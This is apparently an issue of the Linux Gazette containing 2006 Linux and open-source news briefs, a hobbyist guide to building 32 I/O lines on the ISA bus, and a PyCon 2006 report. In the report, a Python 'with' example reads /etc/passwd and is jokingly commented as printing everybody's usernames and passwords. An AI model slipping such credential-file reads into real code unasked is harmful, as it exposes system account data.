...making Linux just a little more fun!
Contents: |
Please submit your News Bytes items in plain text; other formats may be rejected without reading. [You have been warned!] A one- or two-paragraph summary plus a URL has a much higher chance of being published than an entire press release. Submit items to bytes@linuxgazette.net.
At the RSA2006 Security Conference, both Red Hat's Enterprise Linux 4 and Novell's SUSE LINUX Enterprise Server 9 [on IBM eServers] were cited for achieving the Controlled Access Protection Profile under the Common Criteria for Information Security Evaluation, known as CAPP/EAL4+. Sun also revealed plans to apply for CAPP/EAL4 and also for the Labeled Security Protection Profile (LSPP).
Rather than release another Trusted Solaris compilation, Sun will leverage its Solaris 10 OS with the release Solaris Trusted Extensions [a beta is due in April or May], which enhance the security features of 10 to EAL4 levels.
In a March 1st memo to HP CEO Mark Hurd [and sent by Sun to the media and posted on its web site], Sun CEO Scott McNealy said HP should commit to converging HP-UX with Sun's Solaris 10 Unix. This would allow HP customers to use X86 servers with Intel's Xeon and AMD's Opteron processors.
HP currently uses Linux and Windows on its industry-standard X86 servers but has only committed to supporting HP-UX on the 64-bit Itanium architecture. McNealy pointed out that HP supports 64-bit Solaris 10 on its Proliant servers.
McNealy called the move of HP-UX to Intel's Itanium system "...an expensive and risky transition with an uncertain future."
See the full text at: http://www.sun.com/aboutsun/media/features/converge.html.
Oracle recently bought up its second Open Source DB engine by acquiring the SleepCat Software and its Berkeley DB barely 3 months after snapping up InnoDB, the innovative and highly touted transactional engine in MySQL 5. Broad reaction in the MySQL user community was down, dour, and damning [see links].
In response, MySQL is closing a deal to purchase Netfrastructure, the company behind the famed Firebird DB. This means DB guru Jim Starkey, creater and developer of Interbase and co-creator of Firebird, will become a MySQL employee. MySQL will continue to support Netfrastructure customers during a transition period. Prior to this, Oracle held purchase discussions with MySQL officials. [specifics were not released]
The Oracle purchase deftly controls key components of MySQL's offerings and introduces uncertainty about future offerings from MySQL. The InnoDB transaction engine was important because it is ACID-compliant. Hiring Jim Starkey means MySQL will probably create a new transaction engine, perhaps forking from the existing InnoDB source code.
Rumors abound that Oracle is also considering purchasing JBoss and Zend Technologies. PHP-developer Zend featured prominently at the Oracle World mega-conference this fall and Oracle held sessions at the much smaller PHP Conference, clearly positioning itself as a major DB in the LAMP [or LA-Or-P] stack. This is consistent with Oracle's pursuit of Linux and LAMP as a platform independent of its competitors, especially Microsoft.
MySQL announced on Feb. 27 its hiring of Starkey, and also the hiring of a new chief technology officer, Taneli Otala, the former CTO of SenSage.
"It's not about the infrastructure; it's about the data", says a worried Shlomo Kramer, CEO of Imperva, a database security company in California, about threats to DBs and data integrity. Alexander Kornbrust, of Red Database Security GmbH, is developing rootkit-like technology that uses the DB's system functions to mask and manipulate processes and data changes. Worse still, such DB rootkits would be OS independent.
Check this link for more details: http://www.eweek.com/article2/0,1895,1914465,00.asp
The OpenVZ project now hosts a website to freely distribute its OpenVZ virtualization software, provide installation instructions, plus additional documentation as well as access to different support options, including online chat. OpenVZ.org also provides a participation platform for feedback, shared experiences, bug fixes, feature requests and knowledge-sharing with other users.
OpenVZ is operating system level virtualization technology, built on Linux, that creates isolated, secure virtual private servers (VPS) on a single physical server. OpenVZ, supported by SWsoft, is a subset of the Virtuozzo virtualization software product.
Open-Xchange, Inc., the vendor of open source collaboration software, made news in several ways this January.
Open-Xchange, Inc. now offers a free, fully functional 'Live-CD' of Open-Xchange Server 5 that gives users a cost-free way to test all the attributes of the Open Source alternative to Microsoft Exchange.
Built on KNOPPIX Linux, the Live-CD contains a complete edition of Open-Xchange Server 5 that boots directly from the CD-ROM, ensuring that the host computer is not modified in any way. Frank Hoberg, CEO, Open-Xchange Inc, explained, "This is not a polished, pre-run demo, but the real live product that will give everyone who uses it a good idea of what we offer."
It also announced hiring former IDC System Software Vice President Daniel Kusnetzky as Executive Vice President for Marketing Strategy. Kusnetzky is a noted expert on the Open Source industry, and has been a staple as a keynote speaker at industry trade shows. He spent 11 years at IDC doing research on the worldwide market for operating environments and virtualization software and, previous to that, 15 years with the Digital Equipment Corporation.
Finally, Open-Xchange announced that Systems Solutions Inc. of New York, has joined them as a strategic system integration partner. Systems Solutions helped in developing the SUSE Linux OpenExchange collaboration platform for the Americas.
Open-Xchange Server 5 was launched in April 2005 as a commercial product, and supports both Red Hat and SUSE Linux. The GPL version of Open-Xchange Server is downloaded more than 9,000 times each month. The Live-CD can be downloaded from www.open-xchange.com/live.
Novell announced the creation of the AppArmor security project early this year, a new GPL Open Source project dedicated to advancing Linux application security. AppArmor is an intrusion-prevention system that protects Linux and applications from viruses and malware. Novell acquired the technology in 2005 from Immunix, a leading provider of Linux security solutions.
AppArmor limits the interactions between applications and users by watching for possible security violations from a tree of allowed interactions. Unexpected behaviors are blocked. AppArmor builds its application profiles by working with a system administrator; another version includes predefined profiles for applications such as Apache, MySQL, and Postfix and Sendmail email servers.
Novell AppArmor is already being shipped and deployed on SUSE Linux 10.0, Novell's community Linux distribution and its SLES (SUSE Linux Enterprise Server) 9 Service Pack 3.
CNET has awarded Firefox 1.5 its Editor's Choice award, and Firefox has received two awards from PC Magazine: the Technical Excellence Award for Software and the Best of 2005 Award. Firefox also garnered international recognition from UK-based PC Pro and received the publication's Real World Computing Award, and was chosen as the "Editor's Choice" by German-basedPC Professionell magazine.
And, to accelerate adoption of Firefox, Mozilla has recently unveiled the second phase of "Firefox Flicks," its community-driven marketing campaign for the browser. The Firefox Flicks Ad Contest encourages professionals, students, and aspiring creatives in film and TV production, Web design, advertising and animation to submit high-quality 30-second ads about the browser. This new contest builds on the first phase of the campaign, which encouraged Firefox users worldwide to submit video testimonials about their experience with Firefox. More information about Firefox Flicks is available at www.firefoxflicks.com.
FREE Commercial Events of Interest
User Download [ 2.6.15.4 ]: ftp://ftp.kernel.org/pub/linux/kernel/v2.6/linux-2.6.15.4.tar.gz
Dev Download [ 2.6.16-rc5 ]: ftp://ftp.kernel.org/pub/linux/kernel/v2.6/testing/linux-2.6.16-rc5.tar.gz
Gentoo Linux 2006.0, the first release this year, came out in February and boasts many improvements since the 2005.1 version. Major highlights include KDE 3.4.3, GNOME 2.12.2, XFCE 4.2.2, GCC 3.4.4, and a 2.6.15 kernel.
SUSE Linux 10.1 Beta 5 was released in February. Check here for downloads: http://en.opensuse.org/Welcome_to_openSUSE.org
The Linux From Scratch community has announced the release of LFS 6.1.1. This release includes fixes for all known errata since LFS-6.1 was released. A new branch was created to test the removal of hotplug. This branch requires a newer kernel and a newer udev than what is currently in the development branch. Anyone who would like to help test this branch can read the book online, or download to read locally. If you prefer, you can check out the book's XML source from the Subversion repository and render it yourself:
svn co svn://svn.linuxfromscratch.org/LFS/branches/udev_update/BOOK/
http://www.linuxfromscratch.org/lfs/index.html
ZDNET reported that Novell is releasing a new graphics package for its SUSE Linux distro into the Open Source world. The package makes fuller use of advanced computer graphics chips to manage desktop windows and the use of 3D and semi-transparent objects. Based on the widely used OpenGL libraries, XGL updates the interactions between XWindows software and modern graphics hardware.
XGL makes better use of video memory for overlaps and screen redraws and also supports vector graphics, which could replace many of the font bitmaps used in most Linux distros. The source code was originally released in January, but Novell is also adding a development framework for graphics plugins. [The Fedora project has a similar effort underway called AIGLX for 'Accelerated Indirect GL X'.]
The code and future releases will become part of the X.Org source tree and thus could be used by any *nix in the future. It will premier in the next release of SUSE, expected in the early summer.
This link shows XGL in action -- http://news.zdnet.com/i/ne/p/2006/transparency1_400x250.jpg
JBoss(R) Inc. has acquired the distributed transaction monitor and web services technologies owned by Arjuna Technologies and HP and will Open Source them for the JBoss Enterprise Middleware Suite (JEMS(TM)). This allows enterprise-quality middleware to be freely available to the mass market.
The acquisition includes Arjuna Transaction Service Suite (ArjunaTS), one of the most advanced and widely deployed transaction engines in the world with a 20-year pedigree, and Arjuna's Web Services Transaction implementation, the market's only implementation supporting both leading web services specifications -- Web Services Transaction (WS-TX) and Web Services Composite Application Framework (WS-CAF). This implementation is also one of the few that has demonstrated interoperability with other industry leaders such as Microsoft and IBM. The core Arjuna transaction engine will be the foundation of JBoss Enterprise Service Bus (ESB).
As a co-author of the WS-TX and WS-CAF specifications, Arjuna has developed an industrial-strength web services implementation that uniquely supports both specs. In the web services area, a line is being drawn between the specifications, with WS-TX supported by companies like Arjuna, Microsoft, and IBM and WS-CAF supported by Arjuna, Oracle, and Sun among others. With Arjuna's Web Services Transaction implementation as a core product, JEMS bridges the gap between these two camps and remains platform-independent.
JBoss expects to release ArjunaTS and Arjuna's Web Services Transaction implementation as open source JEMS offerings in Q1 2006 backed by JBoss Subscription services, training, and consulting. Like all JEMS products, these offerings will run independently as free-standing products or on any J2EE application server. For more information, visit www.jboss.com/products/transactions.
IBM is readying a special compiler for the new Cell Broadband Engine chip in the forthcoming Sony Play Station 3. That chip has a 64-bit PPC core and 8 additional synergistic processor elements, or SPEs, for real time processing of gameplay. Each SPE has 256 KB of local cache and can read data into a 128-bit register, for single instruction, multiple data tasks.
The Cell BE chip was developed in partnership with Sony and Toshiba and is well adapted to running immersive simulations and also in scientific and signal processing applications. IBM is offering the Cell as a processor option on its BladeCenter H chassis later this year.
The Cell compiler currently runs on Fedora Linux installations on 64-bit x86 computers. Porting Linux to Cell based computers is an unconfirmed option.
The Cell BE compiler implements SPE-specific optimizations, including support for compiler-assisted memory realignment, branch prediction, and instruction fetching. It addresses fine-grained SIMD parallelization as well as the more general OpenMP task-level parallelization. The goal is to provide near super-computer performance in commercial and consumer computers.
A report on the compiler and benchmarking the Cell is at this link : http://www.research.ibm.com/journal/sj/451/eichenberger.html and information on the project is at http://www.research.ibm.com/cell/.
XimpleWare recently announced the availability of version 1.5 of VTD-XML, for both C and Java. This is a next generation open-source XML parser that goes beyond DOM and SAX in terms of performance, memory usage and ease of use.
XimpleWare claims VTD-XML is the world's fastest XML parser, 5x-10x faster than DOM, and 1.5-3x faster than SAX, using a variety of file sizes. VTD-SML features random access with built-in XPath support. Its also uses a third of the memory of a DOM parser. This allows for support of large documents, up to 2 GB.
For demos, latest benchmarks, and software downloads, please visit http://vtd-xml.sf.net.
ClearNova's AJAX-enabled ThinkCAP JX™ rapid application development platform is now available as Open Source under GPL license for non-commercial distribution. AJAX (Asynchronous JavaScript and XML) is a set of programming techniques that allow Web applications to be much more responsive and provide usability on par with traditional client/server applications.
At the core of ThinkCAP's AJAX framework are two popular Open Source AJAX projects: prototype and script.aculo.us. These libraries provide excellent base functionality and are the two projects driving the AJAX functionality of the Ruby-On-Rails project.
ThinkCAP JX allows 4GL developers to rapidly build web-based applications without having to become JAVA, XML and JavaScript experts. ThinkCAP JX is available for download at the www.thinkcap.org.
ThinkCAP JX runs on any operating system and Java application servers such as IBM WebSphere, BEA Weblogic, JBoss, Tomcat, Jetty, and Resin, among others.
Lexar Media, Inc., is bringing Google applications directly to customers by including Picasa, Google Toolbar and Google Desktop Search applications on its line of popular USB flash drives. The offering is the first time consumers will be able to install Google applications from a USB flash drive directly to their desktop.
Customers purchasing a Lexar JumpDrive simply have to plug the device into the USB port and be prompted with instructions to easily install the free applications. If the user accepts installation, Google products automatically install to their computer and are then removed from the USB flash drive.
In January, the WiMAX Forum began issuing certifications for products meeting the 802.16-2004 IEEE standard. If fully implemented, WiMax supports a range of several miles and speeds of up to 40Mbps. The standard for mobile WiMax is 802.16e and was ratified in December of 2005.
Some last minute changes to the standard in late 2005 delayed these first certifications for products in the European-designated 3.5GHz radio frequency band. Certifications for the 2.5GHz radio frequency band used in the US will start in the middle of 2006. Equipment makers seeking certification include Redline Communications, Sequans Communications, and Wavesat. Find more WiMAX info here: http://www.eweek.com/article2/0,1895,1912528,00.asp
Also See: Silicon Valley eyes wireless network - Partnership sets goal:
1,500 square miles of broadband access
http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2006/01/28/BUG4FGUPFQ1.DTL&hw=Wireless+bids&sn=005&sc=829
By combining quantum computation and quantum interrogation, scientists at the University of Illinois at Urbana-Champaign have found an exotic way of determining an answer to an algorithm... without ever running the algorithm.
Using an optical-based quantum computer, a research team led by physicist Paul Kwiat has presented the first demonstration of "counterfactual computation," inferring information about an answer, even though the computer did not run. The researchers reported their work in the Feb. 23 issue of Nature.
Quantum computers have the potential for solving certain types of problems much faster than classical computers. Speed and efficiency are gained because quantum bits can be placed in superpositions of one and zero, as opposed to classical bits, which are either one or zero. Moreover, the logic behind the coherent nature of quantum information processing often deviates from intuitive reasoning, leading to some surprising effects.
"It seems absolutely bizarre that counterfactual computation - using information that is counter to what must have actually happened - could find an answer without running the entire quantum computer," said Kwiat, a John Bardeen Professor of Electrical and Computer Engineering and Physics at Illinois. "But the nature of quantum interrogation makes this amazing feat possible."
"In a sense, it is the possibility that the algorithm could run which prevents the algorithm from running," Kwiat said. "That is at the heart of quantum interrogation schemes, and to my mind, quantum mechanics doesn't get any more mysterious than this."
Investor, philanthropist and co-founder of Microsoft Paul G. Allen unveiled a new Web site, www.PDPplanet.com, as a resource for computer history fans and those interested in Digital Equipment Corporation (DEC) systems and XKL systems. From a PDP-8/S to a DECSYSTEM-20 to a Toad 1, Allen's collection of systems from the late 1960s to the mid-1990s preserves the significant software created on these early computers.
Via the new Web site, registered users from around the world can telnet into a working DECsystem-10 or an XKL Toad-1, create or upload programs, and run them -- essentially stepping back in time to access an "antique" mainframe, and getting a sense of how it felt to be an early programmer.
Along with Allen's Microcomputer Gallery being at the New Mexico Museum of Natural History and Science in Albuquerque (opening later this year), and the Computer History Museum in Mountain View, California, PDP Planet provides an important exploration of early computer technology.
Its MS bug season! IDefense has offered a bounty of $10,000 for uncovering major Windows flaws, but only if MS will identify them as critical. Previously, TippingPoint offered bug 'bonuses' of $1,000-20,000 as part of its Zero Day Initiative [http://www.zerodayinitiative.com/benefits.html].
In an email made public, MS was critical of offering any compensation for efforts now undertaken by computer security companies. "Microsoft believes that responsible disclosure, which involves making sure that an update is available from software vendors the same day the vulnerability is first broadly known, is the best way to protect the end user."
NetworkAnatomy, a Northern California wireless communications company, has taken the lead, on-line, in providing a low-cost [USD$175] reality engineering education series via its monthly OnLine-CTO emagazine. The goal is to overcome the lack of practical WiMax training in the US, where very few WiMax projects have been initiated and there is only a small pool of experienced engineers.
NetworkAnatomy's effort offers "how to" installments, with reference material and skill tests. Click the blinking "New Service -- OnLine-CTO", at the www.networkanatomy.com website, subscribe, and dive into the WIMAX engineering series. NetworkAnatomy can also be contacted by email through onlinecto@networkanatomy.com.
Robotics Trends and IDG World Expo announced in January that Carnegie Mellon University's Robot Hall of Fame will hold its 2006 induction ceremony at the 3rd annual RoboBusiness Conference and Exposition, the international business development event for mobile robotics and intelligent systems.
The conference and exposition will be held in Pittsburgh, PA on June 20-21, 2006. The event website is http://www.robobusiness2006.com
According to Dan Kara, conference chairman and President of Robotics Trends, Inc., "We are extremely pleased to announce that the 2006 Robot Hall of Fame induction ceremony will be part of the RoboBusiness Conference and Exposition. The Robot Hall of Fame induction adds a great deal of excitement, energy, prestige and glamour to the RoboBusiness event. Past inductees to the Robot Hall of Fame include some of the most significant and well known robots in the world including Honda's Asimo, NASA's Mars Pathfinder and Unimate, the first industrial robot arm that worked on the assembly line. The Robot Hall of Fame jurors are an equally distinguished collection of international scholars, researchers, writers, and designers including Gordon Bell, Arthur C. Clarke, Steve Wozniak, Rodney Brooks and others. With the addition of the Robot Hall of Fame induction ceremony, the RoboBusiness event becomes even more impactful, and certainly more entertaining."
Talkback: Discuss this article with The Answer Gang
Howard Dyckoff is a long term IT professional with primary experience at
Fortune 100 and 200 firms. Before his IT career, he worked for Aviation
Week and Space Technology magazine and before that used to edit SkyCom, a
newsletter for astronomers and rocketeers. He hails from the Republic of
Brooklyn [and Polytechnic Institute] and now, after several trips to
Himalayan mountain tops, resides in the SF Bay Area with a large book
collection and several pet rocks.
Abstract: The parallel port is a very popular choice for interfacing. Although there are 8 data output lines as well as the CONTROL and STATUS pins of the parallel port, this is often not sufficient for some complex projects, which require more data I/O lines. This project shows how to get 32 general purpose I/O lines by interfacing with the ISA Bus. Though the PCI bus can be a candidate for interfacing experiments, its greater speed and feature-rich nature present great complexity in terms of hardware and software to beginners. This project can be a stepping stone to those thinking of ultimately getting to the PCI Bus for interfacing experiments. It can also be useful for those thinking of making a Digital Oscilloscope using a PC, A/D and D/A converters, a Microcontroller programmer, etc.
First, let's get familiar with the ISA connector:
We have designated as X(n) the side that contains components on all standard ISA cards. Similarly, Y(n) is the side that contains the solder. It is very important for you to be clear on the above convention: you will damage your motherboard if you mistake one for the other.
The description for most commonly used pins are given below:
* these pins will not be used in this project
Before going into the details of the full project let's examine the part that handles the four 8-bit output lines. The addresses in the range 0x338 to 0x33B were not in use by any devices for input/output operations in our computer.
The three 74LS138 ICs handle the address decoding. We configured the circuit to produce a short pulse on the CLOCK line (represented by green lines on the schematic) whenever an address in the range 0x338 to 0x33B and port output (IOW) is requested.
Whenever the 74LS374 gets a CLOCK pulse it latches in the 8-bit data present in the data bus. 74LS245 is a 3-state Octal Bus Transceiver. It reduces DC loading by isolating the data bus from external loads.
[ This is true, at least in theory. Don't use the output to power your favorite toaster oven, and avoid shorting it to Vss or Vcc; anything other than an optocoupler may not isolate quite as well as the manufacturer promises, and IC shrapnel is difficult to pick out of the ceiling. -- Ben ]
To figure out which I/O port addresses are available for use in this project, we examined the contents of ioports in the /proc directory of our Linux system:
[root@thelinuxmaniac~]# cat /proc/ioports 0000-001f: dma1 0020-0021: pic1 0040-0043: timer0 ....................... ....................... 01f0-01f7: ide0 0378-037a : parport0 037b-037f : parport0 03c0-03df : vga+ ....................... .......................
It is clear from the above output that the addresses 0x238-0x23B and 0x338-0x33B are not being used by any device. This is often the case in most computers. However, if this address is occupied by some device, then you have to change the wiring of address lines to the three 74LS138 ICs. We'll describe the address decoding technique briefly so that you can set up available addresses for the I/O device you are trying to build.
We used the 74LS138 3-to-8 multiplexer for address decoding. Suppose we want to assign the addresses 0x338-0x33B for four 8-bit output lines and 0x238-0x23B for four 8-bit input lines.The binary equivalent of these addresses are:
Address | ||||||||||||||||
0x338 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 |
0x339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 |
0x33A | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 |
0x33B | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 1 |
0x238 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 |
0x239 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 |
0x23A | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 |
0x23B | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 1 |
Address Lines | A15 | A14 | A13 | A12 | A11 | A10 | A9 | A8 | A7 | A6 | A5 | A4 | A3 | A2 | A1 | A0 |
The only address lines that change for any of the eight addresses are A8, A1, and A0 (the whole process of connecting wires to 74LS138 IC is like solving a puzzle!) Connect the remaining wires to the two 74LS138s so that they produce a low output when these lines have the address bits that partially match our addresses. Now, connect the above three lines to the third 74LS138. All 8 outputs of this IC are used to select the 74LS374 latches corresponding to input and output addresses after it is NORed with IOR and IOW; we used the 74LS02 to distinguish between memory IO and port IO addressing.
74LS138 Truth Table | ||||||||||||
G1 | G2 | C | B | A | Y0 | Y1 | Y2 | Y3 | Y4 | Y5 | Y6 | Y7 |
X | H | X | X | X | H | H | H | H | H | H | H | H |
L | X | X | X | X | H | H | H | H | H | H | H | H |
H | L | L | L | L | L | H | H | H | H | H | H | H |
H | L | L | L | H | H | L | H | H | H | H | H | H |
H | L | L | H | L | H | H | L | H | H | H | H | H |
H | L | L | H | H | H | H | H | L | H | H | H | H |
H | L | H | L | L | H | H | H | H | L | H | H | H |
H | L | H | L | H | H | H | H | H | H | L | H | H |
H | L | H | H | L | H | H | H | H | H | H | L | H |
H | L | H | H | H | H | H | H | H | H | H | H | L |
Refer to the 74LS138 datasheet for details |
Now, finally, we are ready to describe the functioning of the complete circuit.
The three 74LS138 IC are used for address decoding along with the two 74LS02s (2-input NOR gate.) Whenever a match is found in the address lines, the respective output line, Y(x) of the third 74LS138 IC (connected to the two 74LS02 IC), goes LOW. These lines along with IOW (and IOR) are connected to the NOR gates (74LS02), which produces a HIGH only when the two inputs go LOW simultaneously.
Hence, the output is high only when:
Remember, if we do not consider the second case, our device will conflict with the memory IO operations in the addresses 0x238-0x23B and 0x338-0x33B.
We can see in the circuit diagram that the output lines of NOR gates are connected to the CLOCK pins of the 74LS374 latch. So, whenever the above two cases match simultaneously, the CLOCK pulse is sent to the respective latch and the data that is present on the data bus at that moment is latched in.
isa.c illustrates the some simple coding methods to control and test the I/O lines of the device created in this project.
if(ioperm(OUTPUT_PORT,LENGTH+1,1)) { ... } if(ioperm(INPUT_PORT,LENGTH+1,1)) { ... } outb(data,port); data = inb(port);
ioperm() gets the permission to access the specified ports from the kernel; outb() and inb() functions (defined in sys/io.h) read from and write to the specified port.
It is not easy to get a complex project to work just by reading an article like this. At some point you will need to debug your hardware. Hopefully, these debugging techniques will help you (as they have helped us - a lot!) to find the problem in your work. You will need a multimeter and some LEDs. What we learned while debugging is that LEDs are the best way to debug hardware of this nature when you don't have sophisticated debugging instruments. Some important techniques we discovered:
while(1){ outb(0x80,0x338); }
There are lots of other debugging techniques which you will probably discover by yourself when you run into problems. Try to ensure that the wiring at the connector that goes into the ISA slot is correct. We checked every part of the device (every IC, all those jumper wires, etc.) and after debugging for about a week we found that IOW and IOR wires were connected to the wrong pins in the ISA slot. So, recheck the wiring. Fortunately, we did not mistake the 12V pin for a 5V pin! ;)
The photo of the device that we constructed is here.
You can get more details and photos related to this project at http://www.mycgiserver.com/~thelinuxmaniac/isa
Talkback: Discuss this article with The Answer Gang
I am studying Computer Engineering at the Institute of Engineering, Pulchowk Campus (NEPAL). I love to program in the Linux Environment. I like coding in C, C++, Java and Web Site Designing (but not always). I like participating in online programming contests like that at topcoder.com. My interests keep on changing and I love reading books on programming, murder mysteries (Sherlock Holmes, Agatha Christie, ...) and watching movies.
My most distinct impression of Dallas was the birds. Two hundred on the electric wires. Another two hundred swoop in for the party. Others sit on nearby trees. Four times as many birds as I've ever seen in one place. All different kinds, all chirping loudly at each other. Now I know where birds go when they fly south for the winter: to Dallas. Especially to the intersection of Belt Line Road and the North Dallas Tollway. Around the intersection stand four or five steel-and-glass skyscrapers. Corporate execs watch the birds through their windows -- and get pooped on when they venture outside. But this isn't downtown; it's a suburb, Addison, with a shopping mall across the tollway. Behind CompUSA is the Marriott hotel where the Python conference took place.
PyCon was started three years ago as a low-budget developers' conference. It had always met at the George Washington University in Washington DC, but attendance has been growing by leaps each year and had reached the facility's capacity. After a nationwide search, the Python Software Foundation decided to sign a two-year contract with a Dallas hotel. That was partly because the Dallas organizers were so enthusiastic and hard-working, the hotel gave us an excellent deal, and we wanted to see how many people in the southern US would attend a conference if it were closer to home. There's no scientific count, but I did meet attendees from Texas, Utah, Arizona, Nevada, and Ohio, many of whom said they had never been to PyCon before. Overall attendance was 410, down from 450. Not bad considering the long move and the fact that many people won't go to Dallas because it's, well, Dallas. But the break-even point was in the high 300s so it didn't bust the bank. The layout had all the meeting rooms next to each other and there were sofas in the hallway, so it was easier to get to events and hold impromptu discussions than last year. The hotel staff was responsive; there were techs on-hand to deal with the sound system. The main problem was the flaky wi-fi, which will hopefully be improved next year (read "better be improved next year".) A hand goes out to Andrew Kuchling, who proved his ability not only in coding and documentation ("What's New in Python 2.x?") but also in conference organizing. This was his first year running PyCon, and he got things running remarkably smoothly.
There seemed to be more international attendees this year. I met people from the UK, Ireland, Germany, the Netherlands, Sweden, Japan, Argentina, and a German guy living in China. This is in spite of the fact that EuroPython and Python UK are now well established, and the main pycon.org site is now an umbrella covering both.
Here's the conference schedule. Several of the talks were audio- or video-recorded and will be available here.
Guido Note 1 delivered two keynotes. One was his usual "State of the Python Universe". The other was a look backward at Python's origins. The latter covered territory similar to this 2003 interview, which explains how Guido created Python to try out some language ideas and improve on ABC, a language he'd had both good and bad experiences with. He also explained why Python doesn't have type declarations: "Declarations exist to slow down the programmer." There you have it.
The state of the Python universe has three aspects: community activity, changes coming in Python 2.5, and changes coming in Python 3.0. There has been a lot of activity the past year:
An .egg is like a Java .jar file: a package that knows its
version, what it depends on, and what optional services it can provide to other
packages or take from other packages. This is similar to .rpm and .deb but is
OS-neutral. It is expected that Linux package managers will eventually use
eggs for Python packages. Eggs can be installed as directories or zip files.
easy_install.py
is a convenient command-line tool to download and
install Python packages (eggs or tarballs) in one step. It will get the
tarball from the Python Cheese Shop Note 2 (formerly known as the Python Package Index),
or scrape the Cheese Shop webpage for the download URL. You can also
provide the tarball directly, or another URL to scrape. Regardless of whether
the original was an egg or a simple tarball, EasyInstall will install it as an
egg, taking care of the *.pth magic needed for eggs.
Waitress: Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon sausage and spam; spam bacon sausage and spam; spam egg spam spam bacon and spam....
Wife: Have you got anything without spam?
Waitress: Well, there's spam egg sausage and spam, that's not got much spam in it.
Wife: Could you do the egg bacon spam and sausage without the spam then?
--Monty Python's Spam skit
The first alpha is expected May 6; the final by September 30. Python 2.4.3 will be released in April, followed by 2.4.4, the last of the 2.4 series. What's New in Python 2.5 is unfinished but explains the changes better than I can.
The most sweeping changes are the generator enhancements
(PEP 342)
and the new with
keyword
(PEP 343). These allow
you to write coroutines and safe blocks.
"Safe" means you can guarantee a file will be closed or a lock released
without littering your code with try/finally
stanzas. The
methodology is difficult to understand unless you have a Computer Science
degree, but the standard library will include helper functions like the
following:
#### OPENING/CLOSING A FILE #### f = open("/etc/passwd", "r") with f: for line in f: # Read the file line by line. words = line.strip().split(":") print words[0], words[1] # Print everybody's username and password. # The file is automatically closed when leaving this block, no matter # whether an exception occurs, or you return or break out, or you simply # fall off the bottom. #### THREAD SYNCHRONIZATION #### import thread lock = thread.allocate_lock() with lock: do_something_thread_unsafe() # The lock is automatically released when leaving this block. #### DATABASE TRANSACTION #### with transaction: c = connection.cursor() c.execute("UPDATE MyTable SET ...") # The transaction automatically commits when leaving this block, or # rolls back if an exception occurs. #### REDIRECT STANDARD OUTPUT #### f = open("log.txt", "w") with stdout_redirected(f): print "Hello, log file!" # Stdout is automatically restored when leaving this block. #### CURSES PROGRAMMING #### with curses.wrapper2() as stdscr: # Switch the screen to CURSES mode. stdscr.addtext("Look ma, ASCII graphics!") # Text mode is automatically restored when leaving this block.
The same pattern works for blocking signals, pushing/popping the locale or decimal precision, etc.
Coroutines are generators that you can inject data into at runtime.
Presumably the data will be used to calculate the next yield
value. This not only models a series of request/response cycles, but it
also promises to radically simplify asynchronous programming, making
Twisted much more accessible. Twisted
uses callbacks to avoid blocking, and that requires you to split your code into
many more functions than normal. But with coroutines those "many functions"
become a single generator.
Other changes for 2.5 include:
?:
operator, it's now spelled:
TRUE_RESULT if EXPRESSION else FALSE_RESULTThis echoes the list comprehension syntax, keeping Python consistent.
import
statements to make
relative imports obvious.any()
and
all()
, which return true if any or all of their arguments are
true.functional.partial
.collections.defaultdict
).easy_install.py
)Guido resisted ctypes
for a long time because it "provides new
ways to make a Python program dump core" by exposing it to arbitrary C bugs.
Skip Montanaro responded by listing several ways you can already make Python
dump core (try these at
home), and it was decided that ctypes
wasn't any worse than
those.
Now that Guido is employed at Google and can spend 50% of his paid time
hacking Python, 3.0 doesn't have to wait until sometime after his 5-year-old
son Orlijn graduates college. The planned changes for 3.0 are listed in PEP 3000. Guido
highlighted the string/unicode issue: the str
type will be
Unicode, and a new bytes
type will be for arbitrary byte
arrays.
There's one late-breaking change, or rather a non-change: the unloved
lambda
will remain as-is forever. lambda
creates
anonymous functions from expressions. Attempts to abolish it were undone by
use cases that required syntax that's arguably worse than lambda
,
and Ruby-style anonymous code blocks didn't fare any better. Programmers who
overuse lambda
should still be shot, however.
The other keynotes were on Plone and BitTorrent. I missed the Plone talk, but for BitTorrent Steve Holden interviewed Bram Cohen, BitTorrent's creator. Bram talked about hacking while slacking (he wrote most of his code while intentionally unemployed and living on savings), his new job as the owner of Bittorrent Inc (not much time to code), why he chose Python for BitTorrent, why BitTorrent doesn't make you into a carrier of malware (you won't be uploading anything you didn't specifically request to download), Pascal, and many other topics.
I made a wonderful faux pas the first evening at dinner when I sat next to Bram, unaware he was going to speak. I asked what he did, and he said he invented BitTorrent. I didn't remember what that was and kept thinking of Linux's former version control system, whose name I couldn't remember. Yet the term "torrent file" kept crossing my brain, clearly a configuration file and not related to the Linux kernel. Finally I remembered, "BitTorrent is that distributed file download thing, right?" Bram said yes. So I asked the guys across the table, "What was the name of Linux's former version control system?" They said, "BitKeeper". Ah ha, no wonder I got them confused. I thought no more about it, then Bram ended up mentioning BitKeeper several times during his keynote, usually in terms of how bad it is. He talked about BitKeeper vs. git (Linux's new version control system), git vs. other things, and then about BitTorrent vs. Avalanche. Avalanche is a distributed file download system from Microsoft, which Bram called vaporware in his blog, stirring up a lot of controversy (including a newspaper article in Australia).
For those who think BitTorrent is all about illegally downloading copyrighted songs and movies, Bram points to SXSW, a music and film festival which will be using BitTorrent to distribute its performances. "The Problem with Publishing: More customers require more bandwidth. The BitTorrent Solution: Users cooperate in the distribution." Other articles point out that a BitTorrent client normally interacts with 30-50 peers, reducing the strain on the original server by thirtyfold.
